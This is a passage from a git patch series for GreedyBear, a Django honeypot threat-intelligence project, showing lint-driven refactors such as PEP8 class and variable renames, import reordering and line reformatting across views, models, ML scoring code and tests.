-        self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, original_interaction_count)
+        self.assertEqual(
+            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+            original_interaction_count,
+        )
 
     def test_get_command_sequence_by_hash_returns_existing(self):
         existing = self.command_sequence
@@ -361,7 +379,7 @@ def test_search_returns_ordered_list(self, mock_search_class):
         mock_search.scan.return_value = iter(mock_hits)
 
         result = list(self.repo.search(minutes_back_to_lookup=10))
-        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:]))
+        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
         self.assertTrue(is_ordered)
 
     @patch("greedybear.cronjobs.repositories.elastic.Search")
diff --git a/tests/test_rf_config.py b/tests/test_rf_config.py
index 3e66f47c..4b597a71 100644
--- a/tests/test_rf_config.py
+++ b/tests/test_rf_config.py
@@ -1,13 +1,14 @@
 import json
 
 from django.test import SimpleTestCase
+
 from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
 from greedybear.settings import ML_CONFIG_FILE
 
 
 class TestRFConfig(SimpleTestCase):
     def setUp(self):
-        with open(ML_CONFIG_FILE, "r") as f:
+        with open(ML_CONFIG_FILE) as f:
             self.config = json.load(f)
 
     def test_rf_classifier_config_loading(self):
@@ -25,7 +26,11 @@ def test_rf_classifier_config_loading(self):
 
         for key, value in params.items():
             actual_value = getattr(model, key)
-            self.assertEqual(actual_value, value, f"RFClassifier parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")
+            self.assertEqual(
+                actual_value,
+                value,
+                f"RFClassifier parameter '{key}' mismatch. Config: {value}, Model: {actual_value}",
+            )
 
     def test_rf_regressor_config_loading(self):
         """
@@ -38,4 +43,8 @@ def test_rf_regressor_config_loading(self):
 
         for key, value in params.items():
             actual_value = getattr(model, key)
-            self.assertEqual(actual_value, value, f"RFRegressor parameter '{key}' mismatch. Config: {value}, Model: {actual_value}")
+            self.assertEqual(
+                actual_value,
+                value,
+                f"RFRegressor parameter '{key}' mismatch. Config: {value}, Model: {actual_value}",
+            )
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index 647e704c..ea6d4b69 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -2,6 +2,7 @@
 
 import numpy as np
 import pandas as pd
+
 from greedybear.cronjobs.scoring.ml_model import Classifier, Regressor
 from greedybear.cronjobs.scoring.random_forest import RFModel
 
@@ -49,11 +50,11 @@ def test_rf_classifier(self):
 
         training_target = classifier.training_target(SAMPLE_DATA)
         self.assertEqual(len(training_target), len(CLASSIFIER_TARGET))
-        for a, b in zip(training_target, CLASSIFIER_TARGET):
+        for a, b in zip(training_target, CLASSIFIER_TARGET, strict=False):
             self.assertEqual(a, b)
 
         df = classifier.score(SAMPLE_DATA)
-        for a, b in zip(df["mock_score"], classifier.model.predict_proba.return_value[:, 1]):
+        for a, b in zip(df["mock_score"], classifier.model.predict_proba.return_value[:, 1], strict=False):
             self.assertEqual(a, b)
 
         auc = classifier.recall_auc(df, training_target)
@@ -86,7 +87,7 @@ def test_rf_regressor(self):
 
         training_target = regressor.training_target(SAMPLE_DATA)
         self.assertEqual(len(training_target), len(REGRESSOR_TARGET))
-        for a, b in zip(training_target, REGRESSOR_TARGET):
+        for a, b in zip(training_target, REGRESSOR_TARGET, strict=False):
             self.assertEqual(a, b)
 
         X_train, X_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
@@ -96,7 +97,7 @@ def test_rf_regressor(self):
         self.assertEqual(len(X_test), len(y_test))
 
         df = regressor.score(SAMPLE_DATA)
-        for a, b in zip(df["mock_score"], regressor.model.predict.return_value):
+        for a, b in zip(df["mock_score"], regressor.model.predict.return_value, strict=False):
             self.assertEqual(a, b)
 
         auc = regressor.recall_auc(df, training_target)
diff --git a/tests/test_scoring_utils.py b/tests/test_scoring_utils.py
index 7e11a531..aed4752b 100644
--- a/tests/test_scoring_utils.py
+++ b/tests/test_scoring_utils.py
@@ -1,7 +1,14 @@
 from datetime import datetime
 
 import pandas as pd
-from greedybear.cronjobs.scoring.utils import correlated_features, date_delta, get_current_data, get_features, multi_label_encode
+
+from greedybear.cronjobs.scoring.utils import (
+    correlated_features,
+    date_delta,
+    get_current_data,
+    get_features,
+    multi_label_encode,
+)
 
 from . import CustomTestCase
 
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index 9d5129cf..44b3beec 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -1,23 +1,24 @@
 import random
 from itertools import product
 
-from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
 from django.test import TestCase
+from rest_framework.serializers import ValidationError
+
+from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.models import IOC, GeneralHoneypot
-from rest_framework.serializers import ValidationError
 
 
 class FeedsRequestSerializersTestCase(TestCase):
     @classmethod
-    def setUpClass(self):
+    def setUpClass(cls):
         GeneralHoneypot.objects.create(
             name="adbhoney",
             active=True,
         )
 
     @classmethod
-    def tearDownClass(self):
+    def tearDownClass(cls):
         # db clean
         GeneralHoneypot.objects.all().delete()
 
@@ -28,8 +29,16 @@ def test_valid_fields(self):
             "ioc_type": ["ip", "domain", "all"],
             "max_age": [str(n) for n in [1, 2, 4, 8, 16]],
             "min_days_seen": [str(n) for n in [1, 2, 4, 8, 16]],
-            "include_reputation": [[], ["known attacker"], ["known attacker", "mass scanner"]],
-            "exclude_reputation": [[], ["known attacker"], ["known attacker", "mass scanner"]],
+            "include_reputation": [
+                [],
+                ["known attacker"],
+                ["known attacker", "mass scanner"],
+            ],
+            "exclude_reputation": [
+                [],
+                ["known attacker"],
+                ["known attacker", "mass scanner"],
+            ],
             "feed_size": [str(n) for n in [100, 200, 5000, 10_000_000]],
             "ordering": [field.name for field in IOC._meta.get_fields()],
             "verbose": ["true", "false"],
@@ -85,14 +94,14 @@ def test_invalid_fields(self):
 
 class FeedsResponseSerializersTestCase(TestCase):
     @classmethod
-    def setUpClass(self):
+    def setUpClass(cls):
         GeneralHoneypot.objects.create(
             name="adbhoney",
             active=True,
         )
 
     @classmethod
-    def tearDownClass(self):
+    def tearDownClass(cls):
         # db clean
         GeneralHoneypot.objects.all().delete()
 
diff --git a/tests/test_views.py b/tests/test_views.py
index a265b3af..03acf9b2 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -1,9 +1,10 @@
-from api.views.utils import is_ip_address, is_sha256hash
 from django.conf import settings
 from django.test import override_settings
-from greedybear.models import GeneralHoneypot, Statistics, viewType
 from rest_framework.test import APIClient
 
+from api.views.utils import is_ip_address, is_sha256hash
+from greedybear.models import GeneralHoneypot, Statistics, viewType
+
 from . import CustomTestCase
 
 
@@ -47,8 +48,14 @@ def test_for_vaild_registered_ip(self):
         self.assertEqual(response.json()["ioc"]["general_honeypot"][1], self.ciscoasa.name)  # FEEDS
         self.assertEqual(response.json()["ioc"]["scanner"], self.ioc.scanner)
         self.assertEqual(response.json()["ioc"]["payload_request"], self.ioc.payload_request)
-        self.assertEqual(response.json()["ioc"]["recurrence_probability"], self.ioc.recurrence_probability)
-        self.assertEqual(response.json()["ioc"]["expected_interactions"], self.ioc.expected_interactions)
+        self.assertEqual(
+            response.json()["ioc"]["recurrence_probability"],
+            self.ioc.recurrence_probability,
+        )
+        self.assertEqual(
+            response.json()["ioc"]["expected_interactions"],
+            self.ioc.expected_interactions,
+        )
 
     def test_for_invalid_authentication(self):
         """Check for a invalid authentication"""
@@ -260,15 +267,15 @@ def test_400_feeds_pagination(self):
 
 class StatisticsViewTestCase(CustomTestCase):
     @classmethod
-    def setUpClass(self):
-        super(StatisticsViewTestCase, self).setUpClass()
+    def setUpClass(cls):
+        super().setUpClass()
         Statistics.objects.all().delete()
         Statistics.objects.create(source="140.246.171.141", view=viewType.FEEDS_VIEW.value)
         Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value)
 
     @classmethod
-    def tearDownClass(self):
-        super(StatisticsViewTestCase, self).tearDownClass()
+    def tearDownClass(cls):
+        super().tearDownClass()
         Statistics.objects.all().delete()
 
     def test_200_feeds_sources(self):

From 54e57317fc212aef5eebb451a5dde02cfe8fec42 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Sun, 4 Jan 2026 22:16:33 +0530
Subject: [PATCH 26/75] Refactor naming conventions to comply with PEP8
 (N801/N802/N803/N806). Closes #671 (#676)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* refactor: rename viewType→ViewType and iocType→IocType (PEP8 N801)

- Renamed class viewType to ViewType
- Renamed class iocType to IocType
- Updated all imports and usages across ~20 files
- Updated models, API views, tests, and cronjobs
- Fixes naming convention violations per PEP8 N801

* refactor: rename ML variables to follow PEP8 (N803/N806) and update Ruff config

- Renamed X → x, X_train → x_train, X_test → x_test in ML code
- Updated ml_model.py: all method parameters and local variables
- Updated random_forest.py: train() method variables
- Removed N801, N802, N803, N806 from Ruff ignore list
- Migration files already excluded via extend-exclude
- Fixes PEP8 N803/N806 violations in ML scoring code

* refactor: fix remaining PEP8 naming violations (N802/N806)

- Renamed generalHoneypots → general_honeypots (3 occurrences)
- Renamed checkAuthentication → check_authentication
- Renamed checkConfiguration → check_configuration
- Updated authentication/urls.py imports and URL patterns
- Renamed X_train, X_test → x_train, x_test in test_rf_models.py
- All PEP8 N801/N802/N803/N806 violations now resolved
- Migration files remain excluded via extend-exclude in .ruff.toml

* chore: update frontend dependencies

* chore: update frontend dependencies
---
 .../configurations/python_linters/.ruff.toml  |  8 +--
 api/views/command_sequence.py                 |  4 +-
 api/views/cowrie_session.py                   |  4 +-
 api/views/enrichment.py                       |  4 +-
 api/views/general_honeypot.py                 |  6 +--
 api/views/statistics.py                       | 14 ++---
 authentication/urls.py                        |  8 +--
 authentication/views.py                       |  4 +-
 .../cronjobs/extraction/ioc_processor.py      |  4 +-
 greedybear/cronjobs/scoring/ml_model.py       | 54 +++++++++----------
 greedybear/cronjobs/scoring/random_forest.py  | 10 ++--
 greedybear/models.py                          | 10 ++--
 tests/__init__.py                             | 10 ++--
 tests/test_ioc_processor.py                   |  6 +--
 tests/test_models.py                          |  8 +--
 tests/test_rf_models.py                       | 10 ++--
 tests/test_views.py                           |  6 +--
 17 files changed, 83 insertions(+), 87 deletions(-)

diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index fb6f0ef7..d51a6a7a 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -73,14 +73,10 @@ ignore = [
     "DJ012",
     # E501: Allow long lines in docstrings
     "E501",
-    # N801/N802/N803: Allow existing naming conventions (viewType, iocType, X for ML, migration functions)
-    "N801",
-    "N802",
-    "N803",
+
     # N804: Allow 'self' in class methods for Django test compatibility
     "N804",
-    # N806: Allow uppercase variable names for ML conventions (X_train, X_test)
-    "N806",
+
     # N818: Allow existing exception naming
     "N818",
     # UP008: Allow explicit super() in tests for clarity
diff --git a/api/views/command_sequence.py b/api/views/command_sequence.py
index 964fc57c..a5137241 100644
--- a/api/views/command_sequence.py
+++ b/api/views/command_sequence.py
@@ -16,7 +16,7 @@
 
 from api.views.utils import is_ip_address, is_sha256hash
 from greedybear.consts import GET
-from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, viewType
+from greedybear.models import IOC, CommandSequence, CowrieSession, Statistics, ViewType
 
 logger = logging.getLogger(__name__)
 
@@ -48,7 +48,7 @@ def command_sequence_view(request):
     include_similar = request.query_params.get("include_similar") is not None
     logger.info(f"Command Sequence view requested by {request.user} for {observable}")
     source_ip = str(request.META["REMOTE_ADDR"])
-    request_source = Statistics(source=source_ip, view=viewType.COMMAND_SEQUENCE_VIEW.value)
+    request_source = Statistics(source=source_ip, view=ViewType.COMMAND_SEQUENCE_VIEW.value)
     request_source.save()
 
     if not observable:
diff --git a/api/views/cowrie_session.py b/api/views/cowrie_session.py
index 8fcffcfd..ed7c9bf8 100644
--- a/api/views/cowrie_session.py
+++ b/api/views/cowrie_session.py
@@ -18,7 +18,7 @@
 
 from api.views.utils import is_ip_address, is_sha256hash
 from greedybear.consts import GET
-from greedybear.models import CommandSequence, CowrieSession, Statistics, viewType
+from greedybear.models import CommandSequence, CowrieSession, Statistics, ViewType
 
 logger = logging.getLogger(__name__)
 
@@ -73,7 +73,7 @@ def cowrie_session_view(request):
 
     logger.info(f"Cowrie view requested by {request.user} for {observable}")
     source_ip = str(request.META["REMOTE_ADDR"])
-    request_source = Statistics(source=source_ip, view=viewType.COWRIE_SESSION_VIEW.value)
+    request_source = Statistics(source=source_ip, view=ViewType.COWRIE_SESSION_VIEW.value)
     request_source.save()
 
     if not observable:
diff --git a/api/views/enrichment.py b/api/views/enrichment.py
index 3eca1741..b0b4ee16 100644
--- a/api/views/enrichment.py
+++ b/api/views/enrichment.py
@@ -14,7 +14,7 @@
 
 from api.serializers import EnrichmentSerializer
 from greedybear.consts import GET
-from greedybear.models import Statistics, viewType
+from greedybear.models import Statistics, ViewType
 
 logger = logging.getLogger(__name__)
 
@@ -39,7 +39,7 @@ def enrichment_view(request):
     serializer.is_valid(raise_exception=True)
 
     source_ip = str(request.META["REMOTE_ADDR"])
-    request_source = Statistics(source=source_ip, view=viewType.ENRICHMENT_VIEW.value)
+    request_source = Statistics(source=source_ip, view=ViewType.ENRICHMENT_VIEW.value)
     request_source.save()
 
     return Response(serializer.data, status=status.HTTP_200_OK)
diff --git a/api/views/general_honeypot.py b/api/views/general_honeypot.py
index 0c10748a..7679eb04 100644
--- a/api/views/general_honeypot.py
+++ b/api/views/general_honeypot.py
@@ -26,11 +26,11 @@ def general_honeypot_list(request):
     logger.info(f"Requested general honeypots list from {request.user}.")
     active = request.query_params.get("onlyActive")
     honeypots = []
-    generalHoneypots = GeneralHoneypot.objects.all()
+    general_honeypots = GeneralHoneypot.objects.all()
     if active == "true":
-        generalHoneypots = generalHoneypots.filter(active=True)
+        general_honeypots = general_honeypots.filter(active=True)
         logger.info(f"Requested only active general honeypots from {request.user}")
-    honeypots.extend([hp.name for hp in generalHoneypots])
+    honeypots.extend([hp.name for hp in general_honeypots])
 
     logger.info(f"General honeypots: {honeypots} given back to user {request.user}")
     return Response(honeypots)
diff --git a/api/views/statistics.py b/api/views/statistics.py
index bd3db3a9..65eb9188 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -10,7 +10,7 @@
 from rest_framework.decorators import action
 from rest_framework.response import Response
 
-from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
+from greedybear.models import IOC, GeneralHoneypot, Statistics, ViewType
 
 logger = logging.getLogger(__name__)
 
@@ -40,11 +40,11 @@ def feeds(self, request, pk=None):
                 "Sources": Count(
                     "source",
                     distinct=True,
-                    filter=Q(view=viewType.FEEDS_VIEW.value),
+                    filter=Q(view=ViewType.FEEDS_VIEW.value),
                 )
             }
         elif pk == "downloads":
-            annotations = {"Downloads": Count("source", filter=Q(view=viewType.FEEDS_VIEW.value))}
+            annotations = {"Downloads": Count("source", filter=Q(view=ViewType.FEEDS_VIEW.value))}
         else:
             logger.error("this is impossible. check the code")
             return HttpResponseServerError()
@@ -67,11 +67,11 @@ def enrichment(self, request, pk=None):
                 "Sources": Count(
                     "source",
                     distinct=True,
-                    filter=Q(view=viewType.ENRICHMENT_VIEW.value),
+                    filter=Q(view=ViewType.ENRICHMENT_VIEW.value),
                 )
             }
         elif pk == "requests":
-            annotations = {"Requests": Count("source", filter=Q(view=viewType.ENRICHMENT_VIEW.value))}
+            annotations = {"Requests": Count("source", filter=Q(view=ViewType.ENRICHMENT_VIEW.value))}
         else:
             logger.error("this is impossible. check the code")
             return HttpResponseServerError()
@@ -95,8 +95,8 @@ def feeds_types(self, request):
             "Cowrie": Count("name", distinct=True, filter=Q(cowrie=True)),
         }
         # feed_type for each general honeypot in the list
-        generalHoneypots = GeneralHoneypot.objects.all().filter(active=True)
-        for hp in generalHoneypots:
+        general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
+        for hp in general_honeypots:
             annotations[hp.name] = Count("name", Q(general_honeypot__name__iexact=hp.name.lower()))
         return self.__aggregation_response_static_ioc(annotations)
 
diff --git a/authentication/urls.py b/authentication/urls.py
index 37563947..47c9c02f 100644
--- a/authentication/urls.py
+++ b/authentication/urls.py
@@ -13,8 +13,8 @@
     RegistrationView,
     ResendVerificationView,
     TokenSessionsViewSet,
-    checkAuthentication,
-    checkConfiguration,
+    check_authentication,
+    check_configuration,
 )
 
 router = routers.DefaultRouter(trailing_slash=False)
@@ -44,10 +44,10 @@
     ),
     path("reset-password", PasswordResetView.as_view(), name="auth_reset-password"),
     path("login", LoginView.as_view(), name="auth_login"),
-    path("configuration", checkConfiguration),
+    path("configuration", check_configuration),
     # auth
     path("", include("certego_saas.apps.auth.urls")),
     path("apiaccess", APIAccessTokenView.as_view(), name="auth_apiaccess"),
-    path("authentication", checkAuthentication),
+    path("authentication", check_authentication),
     path("", include(router.urls)),
 ]
diff --git a/authentication/views.py b/authentication/views.py
index 2571949b..8e69bfda 100644
--- a/authentication/views.py
+++ b/authentication/views.py
@@ -69,13 +69,13 @@ class ResendVerificationView(rest_email_auth.views.ResendVerificationView):
 @api_view([GET])
 @authentication_classes([CookieTokenAuthentication])
 @permission_classes([IsAuthenticated])
-def checkAuthentication(request):
+def check_authentication(request):
     logger.info(f"User: {request.user}, Administrator: {request.user.is_superuser}")
     return Response({"is_superuser": request.user.is_superuser}, status=status.HTTP_200_OK)
 
 
 @api_view([GET])
-def checkConfiguration(request):
+def check_configuration(request):
     logger.info(f"Requested checking configuration from {request.user}.")
     page = request.query_params.get("page")
     errors = {}
diff --git a/greedybear/cronjobs/extraction/ioc_processor.py b/greedybear/cronjobs/extraction/ioc_processor.py
index eb7a9865..286030c2 100644
--- a/greedybear/cronjobs/extraction/ioc_processor.py
+++ b/greedybear/cronjobs/extraction/ioc_processor.py
@@ -3,7 +3,7 @@
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.cronjobs.extraction.utils import is_whatsmyip_domain
 from greedybear.cronjobs.repositories import IocRepository, SensorRepository
-from greedybear.models import IOC, iocType
+from greedybear.models import IOC, IocType
 
 
 class IocProcessor:
@@ -47,7 +47,7 @@ def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None)
             self.log.debug(f"not saved {ioc} because it is a sensor")
             return None
 
-        if ioc.type == iocType.DOMAIN and is_whatsmyip_domain(ioc.name):
+        if ioc.type == IocType.DOMAIN and is_whatsmyip_domain(ioc.name):
             self.log.debug(f"not saved {ioc} because it is a whats-my-ip domain")
             return None
 
diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index 12c1e3c9..641a7417 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -116,16 +116,16 @@ def score(self, df: pd.DataFrame) -> pd.DataFrame:
         if missing_features:
             raise ValueError(f"Missing required features: {missing_features}")
 
-        X = df[self.features].copy()
+        x = df[self.features].copy()
         for feature in MULTI_VAL_FEATURES:
-            X = multi_label_encode(X, feature)
-            X = self.add_missing_features(X)
+            x = multi_label_encode(x, feature)
+            x = self.add_missing_features(x)
 
         result_df = df.copy()
-        result_df[self.score_name] = self.predict(X)
+        result_df[self.score_name] = self.predict(x)
         return result_df
 
-    def recall_auc(self, X: pd.DataFrame, y: pd.DataFrame) -> float:
+    def recall_auc(self, x: pd.DataFrame, y: pd.DataFrame) -> float:
         """
         Calculate the area under the recall curve for top-k predictions.
         Quality metric for both, classification and regression tasks.
@@ -136,17 +136,17 @@ def recall_auc(self, X: pd.DataFrame, y: pd.DataFrame) -> float:
         a quater of the dataset.
 
         Args:
-            X: The input features to generate predictions for.
+            x: The input features to generate predictions for.
             y: Prediction targets.
 
         Returns:
             A score between 0 and 1, where 1 is perfect.
         """
         y = y.reset_index(drop=True)
-        predictions = pd.Series(self.predict(X))
+        predictions = pd.Series(self.predict(x))
         ranked_data = pd.DataFrame({"target": y, "prediction": predictions}).sort_values(by="prediction", ascending=False)
         total_positives = y.sum()
-        max_k = len(X) // 4  # look at the first quater of predictions
+        max_k = len(x) // 4  # look at the first quater of predictions
         k_values = np.linspace(0, max_k, num=SAMPLE_COUNT, dtype=np.int32, endpoint=True)
         recalls = [ranked_data.head(k)["target"].sum() / total_positives for k in k_values]
         area = np.trapezoid(recalls) / SAMPLE_COUNT
@@ -175,16 +175,16 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
         """
 
     @abstractmethod
-    def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+    def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
         """
         Split data into training and test sets.
 
         Args:
-            X: Feature matrix
+            x: Feature matrix
             y: Target values
 
         Returns:
-            list: (X_train, X_test, y_train, y_test) split datasets
+            list: (x_train, x_test, y_train, y_test) split datasets
         """
 
     @abstractmethod
@@ -198,12 +198,12 @@ def train(self, df: pd.DataFrame) -> None:
         """
 
     @abstractmethod
-    def predict(self, X: pd.DataFrame) -> np.ndarray:
+    def predict(self, x: pd.DataFrame) -> np.ndarray:
         """
         Generate predictions for the input features.
 
         Args:
-            X: Feature matrix containing all the required and processed features
+            x: Feature matrix containing all the required and processed features
 
         Returns:
             np.ndarray: Array of predictions with shape (n_samples,)
@@ -229,31 +229,31 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
         """
         return df["interactions_on_eval_day"] > 0
 
-    def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+    def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
         """
         Split data into training and test sets while preserving class distribution.
 
         Args:
-            X: Feature matrix
+            x: Feature matrix
             y: Binary target values
 
         Returns:
-            list: (X_train, X_test, y_train, y_test) split datasets
+            list: (x_train, x_test, y_train, y_test) split datasets
         """
-        return train_test_split(X, y, test_size=0.2, stratify=y)
+        return train_test_split(x, y, test_size=0.2, stratify=y)
 
-    def predict(self, X: pd.DataFrame) -> np.ndarray:
+    def predict(self, x: pd.DataFrame) -> np.ndarray:
         """
         Generate probability predictions for the positive class.
 
         Args:
-            X: Feature matrix containing all the required and processed features
+            x: Feature matrix containing all the required and processed features
 
         Returns:
             np.ndarray: Array of probabilities for the positive class
                 with shape (n_samples,), values in range [0,1]
         """
-        return self.model.predict_proba(X)[:, 1]
+        return self.model.predict_proba(x)[:, 1]
 
 
 class Regressor(MLModel):
@@ -275,28 +275,28 @@ def training_target(self, df: pd.DataFrame) -> pd.DataFrame:
         """
         return df["interactions_on_eval_day"]
 
-    def split_train_test(self, X: pd.DataFrame, y: pd.DataFrame) -> list:
+    def split_train_test(self, x: pd.DataFrame, y: pd.DataFrame) -> list:
         """
         Split data into training and test sets.
 
         Args:
-            X: Feature matrix
+            x: Feature matrix
             y: Continuous target values
 
         Returns:
-            list: (X_train, X_test, y_train, y_test) split datasets
+            list: (x_train, x_test, y_train, y_test) split datasets
         """
-        return train_test_split(X, y, test_size=0.2)
+        return train_test_split(x, y, test_size=0.2)
 
-    def predict(self, X: pd.DataFrame) -> np.ndarray:
+    def predict(self, x: pd.DataFrame) -> np.ndarray:
         """
         Generate numeric predictions.
 
         Args:
-            X: Feature matrix containing all the required and processed features
+            x: Feature matrix containing all the required and processed features
 
         Returns:
             np.ndarray: Array of predicted values with shape (n_samples,)
         """
-        predictions = self.model.predict(X)
+        predictions = self.model.predict(x)
         return np.maximum(predictions, 0)
diff --git a/greedybear/cronjobs/scoring/random_forest.py b/greedybear/cronjobs/scoring/random_forest.py
index bc293547..72c037ee 100755
--- a/greedybear/cronjobs/scoring/random_forest.py
+++ b/greedybear/cronjobs/scoring/random_forest.py
@@ -42,16 +42,16 @@ def train(self, df: pd.DataFrame) -> None:
         """
         self.log.info(f"start training {self.name}")
 
-        X = df[self.features].copy()
+        x = df[self.features].copy()
         y = self.training_target(df).copy()
 
         for feature in MULTI_VAL_FEATURES:
-            X = multi_label_encode(X, feature)
+            x = multi_label_encode(x, feature)
 
-        X_train, X_test, y_train, y_test = self.split_train_test(X, y)
+        x_train, x_test, y_train, y_test = self.split_train_test(x, y)
 
-        self.model = self.untrained_model.fit(X_train, y_train)
-        self.log.info(f"finished training {self.name} - recall AUC: {self.recall_auc(X_test, y_test):.4f}")
+        self.model = self.untrained_model.fit(x_train, y_train)
+        self.log.info(f"finished training {self.name} - recall AUC: {self.recall_auc(x_test, y_test):.4f}")
         self.save()
 
     @property
diff --git a/greedybear/models.py b/greedybear/models.py
index 88630991..77c68e33 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -6,14 +6,14 @@
 from django.db import models
 
 
-class viewType(models.TextChoices):
+class ViewType(models.TextChoices):
     FEEDS_VIEW = "feeds"
     ENRICHMENT_VIEW = "enrichment"
     COMMAND_SEQUENCE_VIEW = "command sequence"
     COWRIE_SESSION_VIEW = "cowrie session"
 
 
-class iocType(models.TextChoices):
+class IocType(models.TextChoices):
     IP = "ip"
     DOMAIN = "domain"
 
@@ -43,7 +43,7 @@ class Meta:
 
 class IOC(models.Model):
     name = models.CharField(max_length=256, blank=False)
-    type = models.CharField(max_length=32, blank=False, choices=iocType.choices)
+    type = models.CharField(max_length=32, blank=False, choices=IocType.choices)
     first_seen = models.DateTimeField(blank=False, default=datetime.now)
     last_seen = models.DateTimeField(blank=False, default=datetime.now)
     days_seen = pg_fields.ArrayField(models.DateField(), blank=True, default=list)
@@ -120,8 +120,8 @@ class Statistics(models.Model):
     view = models.CharField(
         max_length=32,
         blank=False,
-        choices=viewType.choices,
-        default=viewType.FEEDS_VIEW.value,
+        choices=ViewType.choices,
+        default=ViewType.FEEDS_VIEW.value,
     )
     request_date = models.DateTimeField(blank=False, default=datetime.now)
 
diff --git a/tests/__init__.py b/tests/__init__.py
index 5226f137..0bf0a52f 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -10,7 +10,7 @@
     CommandSequence,
     CowrieSession,
     GeneralHoneypot,
-    iocType,
+    IocType,
 )
 
 
@@ -26,7 +26,7 @@ def setUpTestData(cls):
         cls.current_time = datetime.now()
         cls.ioc = IOC.objects.create(
             name="140.246.171.141",
-            type=iocType.IP.value,
+            type=IocType.IP.value,
             first_seen=cls.current_time,
             last_seen=cls.current_time,
             days_seen=[cls.current_time],
@@ -48,7 +48,7 @@ def setUpTestData(cls):
 
         cls.ioc_2 = IOC.objects.create(
             name="99.99.99.99",
-            type=iocType.IP.value,
+            type=IocType.IP.value,
             first_seen=cls.current_time,
             last_seen=cls.current_time,
             days_seen=[cls.current_time],
@@ -70,7 +70,7 @@ def setUpTestData(cls):
 
         cls.ioc_3 = IOC.objects.create(
             name="100.100.100.100",
-            type=iocType.IP.value,
+            type=IocType.IP.value,
             first_seen=cls.current_time,
             last_seen=cls.current_time,
             days_seen=[cls.current_time],
@@ -92,7 +92,7 @@ def setUpTestData(cls):
 
         cls.ioc_domain = IOC.objects.create(
             name="malicious.example.com",
-            type=iocType.DOMAIN.value,
+            type=IocType.DOMAIN.value,
             first_seen=cls.current_time,
             last_seen=cls.current_time,
             days_seen=[cls.current_time],
diff --git a/tests/test_ioc_processor.py b/tests/test_ioc_processor.py
index b033e592..5b68153e 100644
--- a/tests/test_ioc_processor.py
+++ b/tests/test_ioc_processor.py
@@ -3,7 +3,7 @@
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
-from greedybear.models import iocType
+from greedybear.models import IocType
 
 from . import ExtractionTestCase
 
@@ -26,7 +26,7 @@ def test_filters_sensor_ips(self):
     def test_filters_whatsmyip_domains(self, mock_whatsmyip):
         mock_whatsmyip.return_value = True
         self.mock_sensor_repo.sensors = set()
-        ioc = self._create_mock_ioc(name="some.domain.com", ioc_type=iocType.DOMAIN)
+        ioc = self._create_mock_ioc(name="some.domain.com", ioc_type=IocType.DOMAIN)
 
         result = self.processor.add_ioc(ioc, attack_type=SCANNER)
 
@@ -168,7 +168,7 @@ def test_full_update_flow(self):
     def test_only_checks_whatsmyip_for_domains(self, mock_whatsmyip):
         self.mock_sensor_repo.sensors = set()
         self.mock_ioc_repo.get_ioc_by_name.return_value = None
-        ioc = self._create_mock_ioc(name="1.2.3.4", ioc_type=iocType.IP)
+        ioc = self._create_mock_ioc(name="1.2.3.4", ioc_type=IocType.IP)
         self.mock_ioc_repo.save.return_value = ioc
 
         result = self.processor.add_ioc(ioc, attack_type=SCANNER)
diff --git a/tests/test_models.py b/tests/test_models.py
index ae497437..67cabb9b 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -1,4 +1,4 @@
-from greedybear.models import Statistics, iocType, viewType
+from greedybear.models import IocType, Statistics, ViewType
 
 from . import CustomTestCase
 
@@ -6,7 +6,7 @@
 class ModelsTestCase(CustomTestCase):
     def test_ioc_model(self):
         self.assertEqual(self.ioc.name, "140.246.171.141")
-        self.assertEqual(self.ioc.type, iocType.IP.value)
+        self.assertEqual(self.ioc.type, IocType.IP.value)
         self.assertEqual(self.ioc.first_seen, self.current_time)
         self.assertEqual(self.ioc.last_seen, self.current_time)
         self.assertEqual(self.ioc.days_seen, [self.current_time])
@@ -51,11 +51,11 @@ def test_cowrie_session_model(self):
     def test_statistics_model(self):
         self.statistic = Statistics.objects.create(
             source="140.246.171.141",
-            view=viewType.ENRICHMENT_VIEW.value,
